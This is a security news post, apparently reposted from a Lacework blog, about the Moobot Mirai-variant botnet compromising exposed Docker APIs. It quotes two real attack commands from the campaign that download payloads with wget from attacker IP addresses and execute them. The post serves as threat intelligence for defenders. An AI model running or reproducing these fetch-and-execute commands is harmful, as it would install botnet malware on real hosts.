Security

Lacework tracks Moobot: botnet that targets vulnerable Docker APIs

There is an abundance of Mirai-based botnets in the wild however “Moobot”, which targets vulnerable Docker APIs, recently showed up on our radar. This blog describes Moobot development along with the malware variant details. A full indicator list is also provided in our GitHub repository.

As early as September 20th, one of these variants belonging to DDOS botnet Moobot, was used as the payload in a campaign targeting vulnerable docker APIs. After identifying vulnerable APIs, Moobot would modify an existing image to run a cron job and download Mirai . Currently only one provider, a US based ISP, appears to be affected by this activity however Moobot was successful in compromising over 10% of their docker deployments.

Note:Mirai” refers to the source code behind the IOT botnet that has historically targeted vulnerable routers, IP cameras, and DVRs with a suite of exploits. In 2016, the Mirai source code was released and unsurprisingly a massive increase in attacks followed.

Figure 1. Modified Image

Going by the image name, the original container was likely intended for speed testing. After modification, the image is renamed to either /test1, or /test2 and one of two commands executed:

/bin/bash -c ‘apt-get update && apt-get install -y wget cron;service cron start; wget 45.63.53.4/arm7;chmod +x arm7;./arm7;tail -f /dev/null’

/bin/bash -c ‘apt-get update && apt-get install -y wget cron;service cron start; wget 45.14.148.105/k.sh;sh k.sh;tail -f /dev/null’

The arm7 payload from the first wget was identified as the Moobot  Mirai-variant.

Read more on: https://www.lacework.com/moobots-cloud-migration/

Security Report News

Security Report News and guest post account. Opinions and views expressed by guest authors are their own and not necessarily endorsed by Security Report Ltd. or our affiliates.

Recent Posts

ParkMobile’s $32.8 Million Data Breach Settlement = You get $1?

In 2021, parking app ParkMobile suffered a massive data breach impacting 22 million users whose…

3 days ago

8 Brutal Truths About Cybersecurity I Wish I Knew

When I first got into cybersecurity, I thought it was all about hackers in hoodies…

5 days ago

US Air Force Probes Potential SharePoint-Linked Privacy Breach

The US Air Force is investigating a “privacy-related issue” that may have exposed personally identifiable…

6 days ago

Harrods third-party breach exposes 430,000 customer records, hackers reach out

London’s iconic department store Harrods has disclosed that approximately 430,000 customer records were compromised in…

1 week ago

WestJet confirms customer ID, passports stolen in June cyberattack

WestJet confirmed that in a June 2025 cybersecurity incident, a “sophisticated, criminal third party” gained…

1 week ago

Did You Also Get a ‘Real’ Phishing Email From GitHub.com?

Imagine getting an email straight from GitHub’s own notification system: the same one you've trusted…

2 weeks ago

This website uses cookies.